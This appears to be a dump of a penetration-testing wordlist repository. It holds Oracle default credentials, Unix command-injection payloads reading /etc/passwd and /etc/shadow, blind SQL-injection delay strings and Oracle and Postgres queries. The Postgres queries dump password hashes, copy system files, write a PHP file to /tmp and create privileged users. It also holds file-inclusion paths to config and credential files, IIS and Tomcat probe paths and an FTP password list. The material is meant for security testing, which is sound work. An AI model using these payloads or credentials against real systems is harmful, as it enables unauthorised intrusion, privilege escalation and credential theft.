18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/默认用户名密码/oracle/_hci_oracle_passwords.txt:
--------------------------------------------------------------------------------
1 | # This file needs some help!
"AMBU,hacschema"
"QUEUE_USER,qmanager"
"SYS,alLp0ver2"
"SYSTEM,urA7mvP"
"CHANGEMGR,datacontrol"
"CCDEV,ccdev"
"CCDBA,ccnulls "
"CCDATA,ccdata"
"CCFORMS,ccforms"
"CCINTERFACE,ccinterface"
"MCKHEO,mckheo"
"CCREL,ccrel"
"CCQUERY,ccquery"
"CDXWEB,winplu5"
"DRUG1,fdb3schema"
"DRUG2,fdb3schema"
"enc_ent,encent"
"ENT,entpazz"
"ENT_CONFIG,ent_configpazz"
"ADF,adfpazz"
"INF,infpazz"
"INF_CONFIG,inf_configpazz"
"SDM,sdmpazz"
"STRMADM,pazzw0rd"
"ENT_AUD,pazzw0rd"
"ENT_ARCH,pazzw0rd"
"POC_ARCH,pazzw0rd"
"POC_AQ,qmanager"
"INF_AQ,qmanager"
"DATAMGR,datamgr"
"CCUSER,bueno"
"ALERTS,monitorhca"
"HCALERTS,alertsuser"
"AM,ampazz"
"AM_AUD,pazzw0rd"
"AUD,audpazz"
"TMF,tmfpazz"
"MN,mnpazz"
"EH,ehpazz"
"NG,ngpazz"
"DM,dmpazz"
"DMTOOL,dmtoolpazz"
"STG_DMT,stg_dmtpazz"
"WRL,wrlpazz"
"NOTES,notespazz"
"REPORTS,reportspazz"
"ICONS,iconspazz"
"BS,bspazz"
"QZ,qzpazz"
"RM,rmpazz"
"RM_AUD,pazzw0rd"
"COMMGR,commgrpazz"
"OPSERVICE,opservicepazz"
"SEC_CONFIG,sec_configpazz"
"CTXSYS,ctxsyspazz"
"OLOGY,ologypazz"
"OLOGY_CONFIG,ology_configpazz"
"DOC,docpazz"
"DOC_CONFIG,doc_configpazz"
"PORTAL,portal"
"PORTAL_INSTALL,portal_install"
"EBIDBADMIN,ebidbadmin"
"DESIGN_OWNER,owb"
"OWB_RUNTIME_REPOSITORY,owb"
"RUNTIME_A_USER,owb"
2 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/oracle/_hci_oracle_passwords.txt:
--------------------------------------------------------------------------------
1 | # This file needs some help!
"AMBU,hacschema"
"QUEUE_USER,qmanager"
"SYS,alLp0ver2"
"SYSTEM,urA7mvP"
"CHANGEMGR,datacontrol"
"CCDEV,ccdev"
"CCDBA,ccnulls "
"CCDATA,ccdata"
"CCFORMS,ccforms"
"CCINTERFACE,ccinterface"
"MCKHEO,mckheo"
"CCREL,ccrel"
"CCQUERY,ccquery"
"CDXWEB,winplu5"
"DRUG1,fdb3schema"
"DRUG2,fdb3schema"
"enc_ent,encent"
"ENT,entpazz"
"ENT_CONFIG,ent_configpazz"
"ADF,adfpazz"
"INF,infpazz"
"INF_CONFIG,inf_configpazz"
"SDM,sdmpazz"
"STRMADM,pazzw0rd"
"ENT_AUD,pazzw0rd"
"ENT_ARCH,pazzw0rd"
"POC_ARCH,pazzw0rd"
"POC_AQ,qmanager"
"INF_AQ,qmanager"
"DATAMGR,datamgr"
"CCUSER,bueno"
"ALERTS,monitorhca"
"HCALERTS,alertsuser"
"AM,ampazz"
"AM_AUD,pazzw0rd"
"AUD,audpazz"
"TMF,tmfpazz"
"MN,mnpazz"
"EH,ehpazz"
"NG,ngpazz"
"DM,dmpazz"
"DMTOOL,dmtoolpazz"
"STG_DMT,stg_dmtpazz"
"WRL,wrlpazz"
"NOTES,notespazz"
"REPORTS,reportspazz"
"ICONS,iconspazz"
"BS,bspazz"
"QZ,qzpazz"
"RM,rmpazz"
"RM_AUD,pazzw0rd"
"COMMGR,commgrpazz"
"OPSERVICE,opservicepazz"
"SEC_CONFIG,sec_configpazz"
"CTXSYS,ctxsyspazz"
"OLOGY,ologypazz"
"OLOGY_CONFIG,ology_configpazz"
"DOC,docpazz"
"DOC_CONFIG,doc_configpazz"
"PORTAL,portal"
"PORTAL_INSTALL,portal_install"
"EBIDBADMIN,ebidbadmin"
"DESIGN_OWNER,owb"
"OWB_RUNTIME_REPOSITORY,owb"
"RUNTIME_A_USER,owb"
2 |
--------------------------------------------------------------------------------
/操作系统命令执行/command-execution-unix.txt:
--------------------------------------------------------------------------------
1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
3 | <!--#exec%20cmd="/usr/bin/id;-->
4 | <!--#exec%20cmd="/usr/bin/id;-->
5 | /index.html|id|
6 | ;id;
7 | ;id
8 | ;netstat -a;
9 | ;id;
10 | |id
11 | |/usr/bin/id
12 | |id|
13 | |/usr/bin/id|
14 | ||/usr/bin/id|
15 | |id;
16 | ||/usr/bin/id;
17 | ;id|
18 | ;|/usr/bin/id|
19 | \n/bin/ls -al\n
20 | \n/usr/bin/id\n
21 | \nid\n
22 | \n/usr/bin/id;
23 | \nid;
24 | \n/usr/bin/id|
25 | \nid|
26 | ;/usr/bin/id\n
27 | ;id\n
28 | |usr/bin/id\n
29 | |nid\n
30 | `id`
31 | `/usr/bin/id`
32 | a);id
33 | a;id
34 | a);id;
35 | a;id;
36 | a);id|
37 | a;id|
38 | a)|id
39 | a|id
40 | a)|id;
41 | a|id
42 | |/bin/ls -al
43 | a);/usr/bin/id
44 | a;/usr/bin/id
45 | a);/usr/bin/id;
46 | a;/usr/bin/id;
47 | a);/usr/bin/id|
48 | a;/usr/bin/id|
49 | a)|/usr/bin/id
50 | a|/usr/bin/id
51 | a)|/usr/bin/id;
52 | a|/usr/bin/id
53 | ;system('cat%20/etc/passwd')
54 | ;system('id')
55 | ;system('/usr/bin/id')
56 | %0Acat%20/etc/passwd
57 | %0A/usr/bin/id
58 | %0Aid
59 | %0A/usr/bin/id%0A
60 | %0Aid%0A
61 | & ping -i 30 127.0.0.1 &
62 | & ping -n 30 127.0.0.1 &
63 | %0a ping -i 30 127.0.0.1 %0a
64 | `ping 127.0.0.1`
65 | | id
66 | & id
67 | ; id
68 | %0a id %0a
69 | `id`
70 | $;/usr/bin/id
71 |
--------------------------------------------------------------------------------
/SQL注入测试/检测/GenericBlind.fuzz.txt:
--------------------------------------------------------------------------------
1 | # from wapiti
2 | sleep(__TIME__)#
3 | 1 or sleep(__TIME__)#
4 | " or sleep(__TIME__)#
5 | ' or sleep(__TIME__)#
6 | " or sleep(__TIME__)="
7 | ' or sleep(__TIME__)='
8 | 1) or sleep(__TIME__)#
9 | ") or sleep(__TIME__)="
10 | ') or sleep(__TIME__)='
11 | 1)) or sleep(__TIME__)#
12 | ")) or sleep(__TIME__)="
13 | ')) or sleep(__TIME__)='
14 | ;waitfor delay '0:0:__TIME__'--
15 | );waitfor delay '0:0:__TIME__'--
16 | ';waitfor delay '0:0:__TIME__'--
17 | ";waitfor delay '0:0:__TIME__'--
18 | ');waitfor delay '0:0:__TIME__'--
19 | ");waitfor delay '0:0:__TIME__'--
20 | ));waitfor delay '0:0:__TIME__'--
21 | '));waitfor delay '0:0:__TIME__'--
22 | "));waitfor delay '0:0:__TIME__'--
23 | benchmark(10000000,MD5(1))#
24 | 1 or benchmark(10000000,MD5(1))#
25 | " or benchmark(10000000,MD5(1))#
26 | ' or benchmark(10000000,MD5(1))#
27 | 1) or benchmark(10000000,MD5(1))#
28 | ") or benchmark(10000000,MD5(1))#
29 | ') or benchmark(10000000,MD5(1))#
30 | 1)) or benchmark(10000000,MD5(1))#
31 | ")) or benchmark(10000000,MD5(1))#
32 | ')) or benchmark(10000000,MD5(1))#
33 | pg_sleep(__TIME__)--
34 | 1 or pg_sleep(__TIME__)--
35 | " or pg_sleep(__TIME__)--
36 | ' or pg_sleep(__TIME__)--
37 | 1) or pg_sleep(__TIME__)--
38 | ") or pg_sleep(__TIME__)--
39 | ') or pg_sleep(__TIME__)--
40 | 1)) or pg_sleep(__TIME__)--
41 | ")) or pg_sleep(__TIME__)--
42 | ')) or pg_sleep(__TIME__)--
43 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/unix-os/unix_users.txt:
--------------------------------------------------------------------------------
1 | 4Dgifts
2 | EZsetup
3 | OutOfBox
4 | ROOT
5 | adm
6 | admin
7 | administrator
8 | anon
9 | auditor
10 | avahi
11 | avahi-autoipd
12 | backup
13 | bbs
14 | bin
15 | checkfs
16 | checkfsys
17 | checksys
18 | cmwlogin
19 | couchdb
20 | daemon
21 | dbadmin
22 | demo
23 | demos
24 | diag
25 | distccd
26 | dni
27 | fal
28 | fax
29 | ftp
30 | games
31 | gdm
32 | gnats
33 | gopher
34 | gropher
35 | guest
36 | haldaemon
37 | halt
38 | hplip
39 | informix
40 | install
41 | irc
42 | kernoops
43 | libuuid
44 | list
45 | listen
46 | lp
47 | lpadm
48 | lpadmin
49 | lynx
50 | mail
51 | man
52 | me
53 | messagebus
54 | mountfs
55 | mountfsys
56 | mountsys
57 | news
58 | noaccess
59 | nobody
60 | nobody4
61 | nuucp
62 | nxpgsql
63 | operator
64 | oracle
65 | popr
66 | postgres
67 | postmaster
68 | printer
69 | proxy
70 | pulse
71 | rfindd
72 | rje
73 | root
74 | rooty
75 | saned
76 | service
77 | setup
78 | sgiweb
79 | sigver
80 | speech-dispatcher
81 | sshd
82 | sym
83 | symop
84 | sync
85 | sys
86 | sysadm
87 | sysadmin
88 | sysbin
89 | syslog
90 | system_admin
91 | trouble
92 | udadmin
93 | ultra
94 | umountfs
95 | umountfsys
96 | umountsys
97 | unix
98 | us_admin
99 | user
100 | uucp
101 | uucpadm
102 | web
103 | webmaster
104 | www
105 | www-data
106 | xpdb
107 | xpopr
108 | zabbix
109 |
--------------------------------------------------------------------------------
/常用攻击载荷/interesting-metacharacters.txt:
--------------------------------------------------------------------------------
1 | !'
2 | !@#$%%^#$%#$@#$%$$@#$%^^**(()
3 | !@#0%^#0##018387@#0^^**(()
4 | ">]]>
5 | SCRIPT]]>alert('XSS');/SCRIPT]]>
6 | " SCRIPT]]>alert('XSS');/SCRIPT]]>"
7 | " "
8 | "]> &xxe;"
9 | "]> &xxe;"
10 | "]> &xxe;"
11 | "]> &xxe;"
12 | " ]]>"
13 | "![]() cript:alert('XSS')"">"
14 | " "
15 | " XSS"
16 |
--------------------------------------------------------------------------------
/SQL注入测试/ORACLE/ORACLE.txt:
--------------------------------------------------------------------------------
1 | SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
2 | SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
3 | SELECT version FROM v$instance;
4 | SELECT user FROM dual;
5 | SELECT username FROM all_users ORDER BY username;
6 | SELECT name FROM sys.user$;
7 | SELECT name, password, astatus FROM sys.user$;
8 | SELECT name,spare4 FROM sys.user$;
9 | SELECT * FROM session_privs;
10 | SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP';
11 | SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY';
12 | SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
13 | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
14 | SELECT UTL_INADDR.get_host_name FROM dual;
15 | SELECT host_name FROM v$instance;
16 | SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
17 | SELECT UTL_INADDR.get_host_name(' ') FROM dual;
18 | SELECT name FROM V$DATAFILE;
19 | SELECT global_name FROM global_name;
20 | SELECT name FROM v$database;
21 | SELECT instance_name FROM v$instance;
22 | SELECT SYS.DATABASE_NAME FROM DUAL;
23 | SELECT DISTINCT owner FROM all_tables;
24 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
25 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
26 | SELECT table_name FROM all_tables;
27 | SELECT owner, table_name FROM all_tables;
28 | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%ColumnName%';
29 | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=N;
30 | SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
--------------------------------------------------------------------------------
/信息探测/FilenameBruteforce/Extensions.Compressed.fuzz.txt:
--------------------------------------------------------------------------------
1 | 0
2 | 000
3 | 7z
4 | a00
5 | a01
6 | a02
7 | ace
8 | ain
9 | alz
10 | apz
11 | ar
12 | arc
13 | arh
14 | ari
15 | arj
16 | ark
17 | axx
18 | b64
19 | ba
20 | bh
21 | boo
22 | bz
23 | bz2
24 | bzip
25 | bzip2
26 | c00
27 | c01
28 | c02
29 | car
30 | cb7
31 | cbr
32 | cbt
33 | cbz
34 | cp9
35 | cpgz
36 | cpt
37 | dar
38 | dd
39 | deb
40 | dgc
41 | dist
42 | ecs
43 | efw
44 | epi
45 | f
46 | fdp
47 | gca
48 | gz
49 | gzi
50 | gzip
51 | ha
52 | hbc
53 | hbc2
54 | hbe
55 | hki
56 | hki1
57 | hki2
58 | hki3
59 | hpk
60 | hyp
61 | ice
62 | ipg
63 | ipk
64 | ish
65 | j
66 | jar.pack
67 | jgz
68 | jic
69 | kgb
70 | lbr
71 | lemon
72 | lha
73 | lnx
74 | lqr
75 | lz
76 | lzh
77 | lzm
78 | lzma
79 | lzo
80 | lzx
81 | md
82 | mint
83 | mou
84 | mpkg
85 | mzp
86 | oar
87 | p7m
88 | packgz
89 | package
90 | pae
91 | pak
92 | paq6
93 | paq7
94 | paq8
95 | par
96 | par2
97 | pbi
98 | pcv
99 | pea
100 | pet
101 | pf
102 | pim
103 | pit
104 | piz
105 | pkg
106 | pup
107 | puz
108 | pwa
109 | qda
110 | r0
111 | r00
112 | r01
113 | r02
114 | r03
115 | r1
116 | r2
117 | r30
118 | rar
119 | rev
120 | rk
121 | rnc
122 | rp9
123 | rpm
124 | rte
125 | rz
126 | rzs
127 | s00
128 | s01
129 | s02
130 | s7z
131 | sar
132 | sdc
133 | sdn
134 | sea
135 | sen
136 | sfs
137 | sfx
138 | sh
139 | shar
140 | shk
141 | shr
142 | sit
143 | sitx
144 | spt
145 | sqx
146 | sqz
147 | tar
148 | targz
149 | tarxz
150 | taz
151 | tbz
152 | tbz2
153 | tg
154 | tgz
155 | tlz
156 | tlzma
157 | txz
158 | tz
159 | uc2
160 | uha
161 | vem
162 | vsi
163 | wad
164 | war
165 | wot
166 | xef
167 | xez
168 | xmcdz
169 | xpi
170 | xx
171 | xz
172 | y
173 | yz
174 | z
175 | z01
176 | z02
177 | z03
178 | z04
179 | zap
180 | zfsendtotarget
181 | zip
182 | zipx
183 | zix
184 | zoo
185 | zpi
186 | zz
187 |
--------------------------------------------------------------------------------
/Password dictionary/IIS文件和目录.dict:
--------------------------------------------------------------------------------
1 | /.printer
2 | /%NETHOOD%/
3 | /AccessPlatform/
4 | /AccessPlatform/auth/
5 | /AccessPlatform/auth/clientscripts/cookies.js
6 | /AccessPlatform/auth/clientscripts/login.js
7 | /Exadmin/
8 | /ExchWeb/
9 | /Exchange/
10 | /Microsoft-Server-ActiveSync/
11 | /OMA/
12 | /OWA/
13 | /Public/
14 | /_layouts/alllibs.htm
15 | /_layouts/settings.htm
16 | /_layouts/userinfo.htm
17 | /_vti_bin/
18 | /_vti_bin/_vti_aut/fp30reg.dll
19 | /_vti_pvt/
20 | /_WEB_INF/
21 | /a%5c.aspx
22 | /adovbs.inc
23 | /aspnet_files/
24 | /certcontrol/
25 | /certenroll/
26 | /certsrv/
27 | /citrix/
28 | /citrix/AccessPlatform/auth/
29 | /citrix/AccessPlatform/auth/clientscripts/
30 | /AccessPlatform/auth/clientscripts/
31 | /Citrix//AccessPlatform/auth/clientscripts/cookies.js
32 | /Citrix/AccessPlatform/auth/clientscripts/login.js
33 | /Citrix/PNAgent/config.xml
34 | /exchange/root.asp
35 | /forum.asp
36 | /forum_arc.asp
37 | /forum_professionnel.asp
38 | /iisadmin/
39 | /iisadmpwd/achg.htr
40 | /iisadmpwd/aexp.htr
41 | /iisadmpwd/aexp2.htr
42 | /iisadmpwd/aexp2b.htr
43 | /iisadmpwd/aexp3.htr
44 | /iisadmpwd/aexp4.htr
45 | /iisadmpwd/aexp4b.htr
46 | /iisadmpwd/anot.htr
47 | /iisadmpwd/anot3.htr
48 | /iiasdmpwd/
49 | /iishelp/
50 | /iishelp/iis/misc/default.asp
51 | /iissamples/
52 | /imprimer.asp
53 | /includes/adovbs.inc
54 | /msadc/
55 | /null.htw
56 | /pbserver/pbserver.dll
57 | /postinfo.html
58 | /rubrique.asp
59 | /scripts/
60 | /scripts/fpcount.exe
61 | /scripts/cgimail.exe
62 | /scripts/tools/newdsn.exe
63 | /scripts/tools/getdrvs.exe
64 | /scripts/convert.bas
65 | /cgi-bin/htmlscript
66 | /scripts/counter.exe
67 | /scripts/no-such-file.pl
68 | /share/
69 | /tsweb/
70 | /.aspx
71 | /~/.asp
72 | /~/.aspx
73 | /index.shtml
74 | /x.htw
75 | /x.ida
76 | /x.idq
77 | /cgi
78 | /scripts/iisadmin/ism.dll?http/dir
79 | /scripts/samples/search/webhits.exe
--------------------------------------------------------------------------------
/操作系统命令执行/WindowsCommands.fuzz.txt:
--------------------------------------------------------------------------------
1 | a
2 | arp
3 | assoc
4 | at
5 | atmadm
6 | attrib
7 | bootcfg
8 | break
9 | cacls
10 | call
11 | change
12 | chcp
13 | chdir
14 | chkdsk
15 | chkntfs
16 | cipher
17 | cls
18 | cmd
19 | cmstp
20 | color
21 | comp
22 | compact
23 | convert
24 | copy
25 | cprofile
26 | cscript
27 | date
28 | defrag
29 | del
30 | dir
31 | diskcomp
32 | diskcopy
33 | diskpart
34 | doskey
35 | driverquery
36 | echo
37 | endlocal
38 | eventcreate
39 | eventquery
40 | eventtriggers
41 | evntcmd
42 | exit
43 | expand
44 | fc
45 | filter
46 | find
47 | findstr
48 | finger
49 | flattemp
50 | for
51 | format
52 | fsutil
53 | ftp
54 | ftype
55 | getmac
56 | goto
57 | gpresult
58 | gpupdate
59 | graftabl
60 | help
61 | helpctr
62 | hostname
63 | if
64 | ipconfig
65 | ipseccmd
66 | ipxroute
67 | irftp
68 | label
69 | lodctr
70 | logman
71 | lpq
72 | lpr
73 | macfile
74 | mkdir
75 | mmc
76 | mode
77 | more
78 | mountvol
79 | move
80 | msiexec
81 | msinfo32
82 | nbtstat
83 | net
84 | netsh
85 | netstat
86 | nslookup
87 | ntbackup
88 | ntcmdprompt
89 | ntsd
90 | openfiles
91 | pagefileconfig
92 | path
93 | pathping
94 | pause
95 | pbadmin
96 | pentnt
97 | perfmon
98 | ping
99 | popd
100 | print
101 | prncnfg
102 | prndrvr
103 | prnjobs
104 | prnmngr
105 | prnport
106 | prnqctl
107 | prompt
108 | pushd
109 | query
110 | rasdial
111 | rcp
112 | recover
113 | reg
114 | regsvr32
115 | relog
116 | rem
117 | rename
118 | replace
119 | rexec
120 | rmdir
121 | route
122 | rsh
123 | rsm
124 | runas
125 | sc
126 | schtasks
127 | secedit
128 | set
129 | setlocal
130 | shift
131 | shutdown
132 | sort
133 | start
134 | subst
135 | systeminfo
136 | sfc
137 | taskkill
138 | tasklist
139 | tcmsetup
140 | telnet
141 | tftp
142 | time
143 | title
144 | tracerpt
145 | tracert
146 | tree
147 | type
148 | typeperf
149 | unlodctr
150 | ver
151 | verify
152 | vol
153 | vssadmin
154 | w32tm
155 | winnt
156 | winnt32
157 | wmic
158 | xcopy
159 |
--------------------------------------------------------------------------------
/SQL注入测试/POSTGRES/POSTGRES.txt:
--------------------------------------------------------------------------------
1 | SELECT pg_sleep(10);
2 | SELECT version()
3 | SELECT user;
4 | SELECT current_user;
5 | SELECT session_user;
6 | SELECT usename FROM pg_user;
7 | SELECT getpgusername();
8 | SELECT usename FROM pg_user;
9 | SELECT usename, passwd FROM pg_shadow;
10 | SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user;
11 | SELECT usename FROM pg_user WHERE usesuper IS TRUE
12 | SELECT inet_server_addr();
13 | SELECT inet_server_port();
14 | SELECT current_setting('data_directory');
15 | SELECT current_setting('hba_file');
16 | SELECT current_database()
17 | SELECT datname FROM pg_database
18 | SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
19 | SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
20 | SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%GuessCommonColumnName%';
21 | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0;
22 | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
23 | CREATE TABLE mydata(t text);
24 | COPY mydata FROM '/etc/passwd';
25 | ...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1;
26 | ...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2;
27 | DROP TABLE mytest mytest;
28 | CREATE TABLE mytable (mycol text);
29 | INSERT INTO mytable(mycol) VALUES ('');
30 | COPY mytable (mycol) TO '/tmp/test.php';
31 | CREATE USER HR PASSWORD 'Zer0Lulz';
32 | CREATE USER HR PASSWORD 'Zer0Lulz' CREATEUSER;
33 | ALTER USER HR CREATEUSER CREATEDB;
34 | DROP USER HR;
--------------------------------------------------------------------------------
/信息探测/PredictableRes/ApacheTomcat.fuzz.txt:
--------------------------------------------------------------------------------
1 | /examples
2 | /examples/jsp/index.html
3 | /examples/jsp/snp/snoop.jsp
4 | /examples/jsp/source.jsp
5 | /examples/servlet/HelloWorldExample
6 | /examples/servlet/SnoopServlet
7 | /examples/servlet/TroubleShooter
8 | /examples/servlet/default/jsp/snp/snoop.jsp
9 | /examples/servlet/default/jsp/source.jsp
10 | /examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
17 | /examples/servlet/snoop
18 | /examples/servlets/index.html
19 | /jsp-examples
20 | /manager
21 | /manager/deploy?path=foo
22 | /manager/html/
23 | /servlet/default/
24 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
27 | /servlet/org.apache.catalina.servlets.DefaultServlet/
28 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
29 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet
30 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
32 | /servlet/org.apache.catalina.servlets.ManagerServlet
33 | /servlet/org.apache.catalina.servlets.SnoopAllServlet
34 | /servlet/org.apache.catalina.servlets.WebdavServlet/
35 | /tomcat-docs
36 | /webdav
37 | /webdav/index.html
38 | /webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
39 | /webdav/servlet/webdav/
40 | /conf/
41 | /conf/server.xml/
42 | /WEB-INF/
43 | /WEB-INF/web.xml
44 | /WEB-INF/classes/
45 | /shared/
46 | /shared/lib/
47 |
--------------------------------------------------------------------------------
/Password dictionary/FtpPassword.dict:
--------------------------------------------------------------------------------
1 | anonymous
2 | user
3 | ftp
4 | 1
5 | 12
6 | 123
7 | 1234
8 | 12345
9 | 123456
10 | 1234567
11 | 12345678
12 | 123456789
13 | 1234567890
14 | 2
15 | 3
16 | 4
17 | 5
18 | 6
19 | 7
20 | 8
21 | 9
22 | 0
23 | 11
24 | 22
25 | 33
26 | 44
27 | 55
28 | 66
29 | 77
30 | 88
31 | 99
32 | 00
33 | 111
34 | 222
35 | 333
36 | 444
37 | 555
38 | 666
39 | 777
40 | 888
41 | 999
42 | 000
43 | 1111
44 | 2222
45 | 3333
46 | 4444
47 | 5555
48 | 6666
49 | 7777
50 | 8888
51 | 9999
52 | 0000
53 | 11111
54 | 22222
55 | 33333
56 | 44444
57 | 55555
58 | 66666
59 | 77777
60 | 88888
61 | 99999
62 | 00000
63 | 111111
64 | 222222
65 | 333333
66 | 444444
67 | 555555
68 | 666666
69 | 777777
70 | 888888
71 | 999999
72 | 000000
73 | 1
74 | 12
75 | 123
76 | 1234
77 | 12345
78 | 123456
79 | 1234567
80 | 12345678
81 | 123456789
82 | 1234567890
83 | 2
84 | 3
85 | 4
86 | 5
87 | 6
88 | 7
89 | 8
90 | 9
91 | 0
92 | 11
93 | 22
94 | 33
95 | 44
96 | 55
97 | 66
98 | 77
99 | 88
100 | 99
101 | 00
102 | 111
103 | 222
104 | 333
105 | 444
106 | 555
107 | 666
108 | 777
109 | 888
110 | 999
111 | 000
112 | 1111
113 | 2222
114 | 3333
115 | 4444
116 | 5555
117 | 6666
118 | 7777
119 | 8888
120 | 9999
121 | 0000
122 | 11111
123 | 22222
124 | 33333
125 | 44444
126 | 55555
127 | 66666
128 | 77777
129 | 88888
130 | 99999
131 | 00000
132 | 111111
133 | 222222
134 | 333333
135 | 444444
136 | 555555
137 | 666666
138 | 777777
139 | 888888
140 | 999999
141 | 000000
142 | 123123
143 | 123321
144 | 888888
145 | 111111
146 | 111222
147 | 000111
148 | qwe
149 | qwer
150 | qwert
151 | qweasd
152 | qazwsx
153 | qazxsw
154 | zxczxc
155 | 1qaz2wsx
156 | 123qwe
157 | 123qweasd
158 | 123asd
159 | qwezxc
160 | qazwsxedc
161 | zxcvbn
162 | asdfgh
163 | qwerty
164 | qazxdr
165 | qwaszx
166 | 888888
167 | 88888888
168 | 000000
169 | 00000000
170 | 111111
171 | 11111111
172 | aaaaaa
173 | aaaaaaaa
174 | 135246
175 | 135246789
--------------------------------------------------------------------------------
/文件包含测试/Windows文件包含.txt:
--------------------------------------------------------------------------------
1 | php://input
2 | C:\boot.ini
3 | C:\WINDOWS\win.ini
4 | C:\WINDOWS\php.ini
5 | C:\WINNT\php.ini
6 | \xampp\phpMyAdmin\config.inc
7 | \xampp\phpMyAdmin\phpinfo.php
8 | \xampp\phpmyadmin\config.inc
9 | \xampp\phpmyadmin\phpinfo.php
10 | \xampp\phpmyadmin\config.inc.php
11 | \xampp\phpMyAdmin\config.inc.php
12 | \xampp\apache\conf\httpd.conf
13 | \xampp\FileZillaFTP\FileZilla Server.xml
14 | \xampp\MercuryMail\mercury.ini
15 | \mysql\bin\my.ini
16 | \xampp\php\php.ini
17 | \xampp\phpMyAdmin\config.inc.php
18 | \xampp\tomcat\conf\tomcat-users.xml
19 | \xampp\tomcat\conf\web.xml
20 | \xampp\sendmail\sendmail.ini
21 | \xampp\webalizer\webalizer.conf
22 | \xampp\webdav\webdav.txt
23 | \xampp\apache\logs\error.log
24 | \xampp\apache\logs\access.log
25 | \xampp\FileZillaFTP\Logs
26 | \xampp\FileZillaFTP\Logs\error.log
27 | \xampp\FileZillaFTP\Logs\access.log
28 | \xampp\MercuryMail\LOGS\error.log
29 | \xampp\MercuryMail\LOGS\access.log
30 | \xampp\mysql\data\mysql.err
31 | \xampp\sendmail\sendmail.log
32 | \apache\log\error.log
33 | \apache\log\access.log
34 | \apache\log\error_log
35 | \apache\log\access_log
36 | \apache2\log\error.log
37 | \apache2\log\access.log
38 | \apache2\log\error_log
39 | \apache2\log\access_log
40 | \log\error.log
41 | \log\access.log
42 | \log\error_log
43 | \log\access_log
44 | \apache\logs\error.log
45 | \apache\logs\access.log
46 | \apache\logs\error_log
47 | \apache\logs\access_log
48 | \apache2\logs\error.log
49 | \apache2\logs\access.log
50 | \apache2\logs\error_log
51 | \apache2\logs\access_log
52 | \logs\error.log
53 | \logs\access.log
54 | \logs\error_log
55 | \logs\access_log
56 | \log\httpd\access_log
57 | \log\httpd\error_log
58 | \logs\httpd\access_log
59 | \logs\httpd\error_log
60 | \opt\xampp\logs\access_log
61 | \opt\xampp\logs\error_log
62 | \opt\xampp\logs\access.log
63 | \opt\xampp\logs\error.log
64 | \Program Files\Apache Group\Apache\logs\access.log
65 | \Program Files\Apache Group\Apache\logs\error.log
66 | \Program Files\Apache Group\Apache\conf\httpd.conf
67 | \Program Files\Apache Group\Apache2\conf\httpd.conf
68 | \Program Files\xampp\apache\conf\httpd.conf
--------------------------------------------------------------------------------
/控制字符/URIhex.fuzz.txt:
--------------------------------------------------------------------------------
1 | # Full set of hex values
2 | %00
3 | %01
4 | %02
5 | %03
6 | %04
7 | %05
8 | %06
9 | %07
10 | %08
11 | %09
12 | %0a
13 | %0b
14 | %0c
15 | %0d
16 | %0e
17 | %0f
18 | %10
19 | %11
20 | %12
21 | %13
22 | %14
23 | %15
24 | %16
25 | %17
26 | %18
27 | %19
28 | %1a
29 | %1b
30 | %1c
31 | %1d
32 | %1e
33 | %1f
34 | %20
35 | %21
36 | %22
37 | %23
38 | %24
39 | %25
40 | %26
41 | %27
42 | %28
43 | %29
